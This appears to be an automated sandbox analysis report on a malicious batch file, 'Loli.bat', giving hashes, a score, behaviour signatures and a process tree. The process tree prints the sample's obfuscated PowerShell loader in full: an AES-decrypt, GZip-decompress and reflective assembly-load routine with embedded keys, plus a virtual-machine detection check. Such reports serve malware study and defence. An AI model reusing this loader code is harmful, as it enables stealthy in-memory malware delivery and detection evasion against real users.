Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
18-12-2024 01:57
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
Loli.bat
-
Size
7.3MB
-
MD5
8a7f2cf2f4a59fc4220c677d3b8df79e
-
SHA1
6bb7854dc78dcb7a5e419e5eec371f4a776bb6a7
-
SHA256
37f8cdab00b96fa1d7f5edd1c0d7ed1c048b7cf0a94b30e4b2fe507dbd69ebff
-
SHA512
15acdd90a51634c1dbfcbee7dd2822742e42c4618e6590e238ac08abbb26c53e3c3e64e98ddb5439c7499af90eca66bb49c7dfeb5b6e01693e4e521fa5edbfc4
-
SSDEEP
49152:ATU9DCJDJw+wDkT1uYtsfLfYJZpXAQfiWBpvuLpCKUYCPFJJ+weKaTYHlFYdWKhL:n
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its display window hidden.
pid Process
2056 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process
2056 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process
Token: SeDebugPrivilege 2056 powershell.exe
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target
PID 2304 wrote to memory of 2392 2304 cmd.exe 31
PID 2304 wrote to memory of 2392 2304 cmd.exe 31
PID 2304 wrote to memory of 2392 2304 cmd.exe 31
PID 2304 wrote to memory of 2536 2304 cmd.exe 32
PID 2304 wrote to memory of 2536 2304 cmd.exe 32
PID 2304 wrote to memory of 2536 2304 cmd.exe 32
PID 2304 wrote to memory of 2988 2304 cmd.exe 33
PID 2304 wrote to memory of 2988 2304 cmd.exe 33
PID 2304 wrote to memory of 2988 2304 cmd.exe 33
PID 2304 wrote to memory of 2056 2304 cmd.exe 34
PID 2304 wrote to memory of 2056 2304 cmd.exe 34
PID 2304 wrote to memory of 2056 2304 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\fsutil.exe
fsutil fsinfo drives
2⤵PID:2392
-
-
C:\Windows\system32\findstr.exe
findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
2⤵PID:2536
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function mlBf($ELFV){ Invoke-Expression -Verbose -WarningAction Inquire '$cUKE=[JZSyJZsJZteJZm.JZSJZeJZcuJZrJZiJZtJZyJZ.CJZrJZypJZtJZoJZgrJZaJZpJZhJZy.JZAeJZsJZ]:JZ:CJZrJZeJZaJZtJZe(JZ)JZ;'.Replace('JZ', ''); Invoke-Expression -WarningAction Inquire -Verbose '$cUKE.MUcodUceUc=[UcSyUcsUctUcemUc.UcSUceUccUcurUciUctyUc.UcCUcryUcpUctUcoUcgrUcapUchUcy.UcCiUcpUchUceUcrUcMoUcdUce]Uc:Uc:UcCBUcCUc;'.Replace('Uc', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$cUKE.PGxadGxdGxinGxg=Gx[GxSGxysGxtGxeGxmGx.GxSeGxcGxurGxiGxtGxy.GxCGxrGxyGxptGxogGxrGxapGxhyGx.GxPGxaGxdGxdiGxnGxgMGxoGxdGxe]Gx:Gx:GxPGxKCGxSGx7;'.Replace('Gx', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$cUKE.KmNeymN=mN[SmNysmNtmNemNm.mNCmNomNnmNvmNermNtmN]:mN:mNFmNromNmmNBmNamNsemN64mNSmNtrmNinmNgmN("7mNxhmNEmNmFmNkymNdmNQmNABmNgmNJmNjmNxmN5SmN2mNzXmN4mNgmNyrmNZmN5mNbmNevmNGYmNPmN6NmN3FmNBmNEmNDmNEmNAsmN=mN");'.Replace('mN', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$cUKE.IqHV=qH[qHSyqHstqHeqHmqH.CqHoqHnqHvqHeqHrtqH]qH::qHFqHrqHomqHBqHaqHsqHe6qH4SqHtqHriqHngqH("7qHkeqHvqHCJqHfOqH5qHxqHcGqHIqHhqHeqH7qHI+qH/qHv7qHAqH=qH=");'.Replace('qH', ''); $Llou=$cUKE.CreateDecryptor(); $jyzK=$Llou.TransformFinalBlock($ELFV, 0, $ELFV.Length); $Llou.Dispose(); $cUKE.Dispose(); $jyzK;}function OVPC($ELFV){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$AFBf=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr(,$ELFV);'.Replace('lr', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose -WarningAction Inquire '$gddj=Nlrewlr-lrOblrjelrclrtlr Slrylrslrtlrelrm.lrIlrO.lrMlrelrmolrrlrylrSlrtrlrealrmlr;'.Replace('lr', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$tBrH=NPFewPF-PFObPFjePFcPFtPF 
SPFyPFsPFtPFePFm.PFIPFO.PFCPFoPFmpPFrPFePFsPFsiPFonPF.PFGZPFipPFSPFtPFrPFePFamPF($AFBf, [PFIOPF.PFCoPFmpPFrPFePFssPFiPFoPFnPF.PFCoPFmPFprPFePFsPFsiPFoPFnPFMPFodPFe]PF:PF:DPFecPFoPFmPFpPFrPFesPFsPF);'.Replace('PF', ''); $tBrH.CopyTo($gddj); $tBrH.Dispose(); $AFBf.Dispose(); $gddj.Dispose(); $gddj.ToArray();}function rFaI($ELFV,$XuUO){ Invoke-Expression -Verbose '$cPFF=[PJSyPJsPJtePJm.PJRPJePJflPJePJcPJtPJiPJonPJ.PJAsPJsPJePJmbPJlPJyPJ]PJ::PJLoPJaPJd([byte[]]$ELFV);'.Replace('PJ', ''); Invoke-Expression -InformationAction Ignore '$GtPT=$cPFF.EjyntjyrjyyPjyoijynjyt;'.Replace('jy', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$GtPT.WqInWqvWqokWqe(Wq$WqnWqulWqlWq, $XuUO);'.Replace('Wq', '');}$TzAi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $TzAi;$drwF=[System.IO.File]::ReadAllText($TzAi).Split([Environment]::NewLine);foreach ($EhXl in $drwF) { if ($EhXl.StartsWith('bhKKm')) { $cwwY=$EhXl.Substring(5); break; }}$tyyO=[string[]]$cwwY.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$jQc = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[0].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$oYu = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[1].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$bao = OVPC (mlBf ([zSCozSnzSvezSrtzS]zS:zS:FzSrzSozSmzSBzSaszSezS64zSSzStzSrizSnzSgzS($tyyO[2].Replace("#", "/").Replace("@", "A"))));'.Replace('zS', '');rFaI $jQc $null;rFaI $oYu $null;rFaI $bao (,[string[]] (''));2⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-